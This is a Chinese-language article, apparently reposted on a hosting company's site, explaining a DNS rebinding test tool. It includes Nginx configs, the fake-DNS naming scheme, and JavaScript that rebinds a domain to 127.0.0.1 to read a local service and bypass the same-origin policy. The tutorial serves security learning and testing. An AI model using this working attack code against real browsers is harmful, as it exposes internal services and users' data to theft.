這篇文章將為大家詳細講解有關(guān)DNS-Rebinding-Tool是什么腳本,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。
成都創(chuàng)新互聯(lián)公司基于成都重慶香港及美國等地區(qū)分布式IDC機房數(shù)據(jù)中心構(gòu)建的電信大帶寬,聯(lián)通大帶寬,移動大帶寬,多線BGP大帶寬租用,是為眾多客戶提供專業(yè)服務(wù)器托管報價,主機托管價格性價比高,為金融證券行業(yè)雙線服務(wù)器托管,ai人工智能服務(wù)器托管提供bgp線路100M獨享,G口帶寬及機柜租用的專業(yè)成都idc公司。
DNS-Rebinding-Tool是一款帶有自定義腳本的DNS重綁定工具,該項目集成了多種功能,可以用來測試DNS重綁定攻擊,并幫助我們更加深入地了解這種類型的網(wǎng)絡(luò)攻擊。該工具由一個Web服務(wù)器和一個偽DNS服務(wù)器組成,這個偽DNS服務(wù)器主要功能就是用來響應(yīng)用戶請求的。
Web服務(wù)器的根索引允許用戶自定義配置,并且可以使用基礎(chǔ)的Web圖形界面執(zhí)行攻擊測試。
Web服務(wù)器主機的基礎(chǔ)Nginx配置如下:
server { listen 80; server_name dnsrebindtool.43z.one; location / { proxy_pass http://localhost:5000; }}
Web服務(wù)器的/attack路徑可以讀取GET參數(shù)“script”,該參數(shù)可以提供一個Basic64編碼的JavaScript腳本,并以嵌入在常規(guī)HTML頁面中的解碼代碼來響應(yīng)請求:
% curl "http://dnsrebindtool.43z.one/attack?script=YWxlcnQoMSk=" <html> <script> setTimeout(function(){ alert(1) }, 3000) </script></html>
在我注冊的域名43z.one中,我針對子域名rebind配置了一條NS記錄,并指向了該工具托管的IP地址:
ns A 81.4.124.10rebind NS ns.43z.one
DNS服務(wù)器只會響應(yīng)下列各式的查詢請求:
evcmxfm4g . 81-4-124-10 . 127-0-0-1 .rebind.43z.one
第一個部分(子域名)是一個隨機ID,每次攻擊會話會生成一個這樣的隨機ID,第二個部分是DNS服務(wù)器在兩秒后需要響應(yīng)的IP地址,第三部分是時間間隔過后DNS服務(wù)器需要響應(yīng)的IP地址:
$ date && nslookup -type=a evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one Fri Feb 2 21:18:20 CET 2018Server: 8.8.8.8Address: 8.8.8.8#53Non-authoritative answer:Name: evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.oneAddress: 81.4.124.10$ date && nslookup -type=a evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.oneFri Feb 2 21:18:23 CET 2018Server: 8.8.8.8Address: 8.8.8.8#53Non-authoritative answer:Name: evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.oneAddress: 127.0.0.1
最后就是針對重綁定域名的Nginx配置項了,工具只接受/attack路徑,其他傳遞過來的參數(shù)都會以錯誤信息予以響應(yīng),這種機制允許攻擊者攻擊端口80上的其他服務(wù),例如/api/monitoring/stats:
server { listen 80; server_name *.rebind.43z.one; location / { return 404; } location /attack { proxy_pass http://localhost:5000/attack; }}
var xhr = new XMLHttpRequest()xhr.open('GET', 'czg9g2olz.81-4-124-10.127-0-0-1.rebind.43z.one', false)xhr.send()// first time the browser sees this domain it queries the dns server// and gets 81.4.124.10// sleep for more than 2 secxhr.open('GET', 'czg9g2olz.81-4-124-10.127-0-0-1.rebind.43z.one', false)xhr.send()// still uses 81.4.124.10 (AND NOT 127.0.0.1)// NO dns query happened browser used cached IP
這也是此類攻擊存在的一個“通病”,為了實現(xiàn)攻擊,瀏覽器需要重新發(fā)送一個新的DNS查詢請求來獲取第二個IP地址。我的測試結(jié)果表明,我們可以使用下列腳本來測量WAIT變量(查詢請求的發(fā)送時間間隔)的最優(yōu)值,我的測試平臺為Debian buster/sid,瀏覽器版本為Chromium 62.0.3202.89:
var WAIT = 200var start = Date.now()var interval = setInterval(function(){ var xhr = new XMLHttpRequest() xhr.open('GET', '//' + $REBIND_DOMAIN, false) xhr.send() if(xhr.status == 200){ document.body.innerHTML = (Date.now() - start)/1000 document.body.innerHTML += xhr.responseText clearInterval(interval) return }}, WAIT)
WAIT值/毫秒 | Chrome發(fā)送的請求數(shù) | 查詢DNS的間隔 |
---|---|---|
0 | 700 | 60 |
10 | 700 | 60 |
100 | 600 | 63 |
120 | 500 | 63 |
150 | 400 | 63 |
180 | 400 | 75 |
200 | 300 | 63 |
220 | 300 | 69 |
250 | 300 | 78 |
280 | 300 | 87 |
300 | 200 | 63 |
320 | 200 | 67 |
340 | 200 | 71 |
360 | 200 | 75 |
380 | 200 | 79 |
400 | 200 | 83 |
1000 | 100 | 103 |
echo -e "HTTP/1.1 200 OK\n\n TOPSECRET" | sudo nc -lvp 80 -q1 127.0.0.1
這個netcat實例可以提供一些我們所感興趣的內(nèi)容,這里我保留了默認的重綁定域名“$RANDOM$.81-4-124-10.127-0-0-1.rebind.43z.one”以及默認腳本。
var start = Date.now()var interval = setInterval(function(){ var xhr = new XMLHttpRequest() xhr.open('GET', '//' + $REBIND_DOMAIN, false) xhr.send() if(xhr.status == 200){ document.body.innerHTML = (Date.now() - start)/1000 document.body.innerHTML += xhr.responseText clearInterval(interval) return }}, 200)
訪問【dnsrebindtool.43z.one】,然后點擊“Attack”按鈕。打開開發(fā)工具的Network標簽,我們可以直接看到后臺所發(fā)生的的情況。我過濾掉了字符串“TOPSECRET”,我們的DNS重綁定攻擊成功繞過了SOP,為了要從iframe中獲取泄露的數(shù)據(jù),我們還需要使用 Window.PostMessage()或?qū)?shù)據(jù)轉(zhuǎn)發(fā)到攻擊者的另一臺服務(wù)器端。
關(guān)于“DNS-Rebinding-Tool是什么腳本”這篇文章就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,使各位可以學(xué)到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。
網(wǎng)站名稱:DNS-Rebinding-Tool是什么腳本
分享URL:http://vcdvsql.cn/article48/gjeehp.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供電子商務(wù)、自適應(yīng)網(wǎng)站、建站公司、網(wǎng)站設(shè)計、靜態(tài)網(wǎng)站、外貿(mào)建站
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)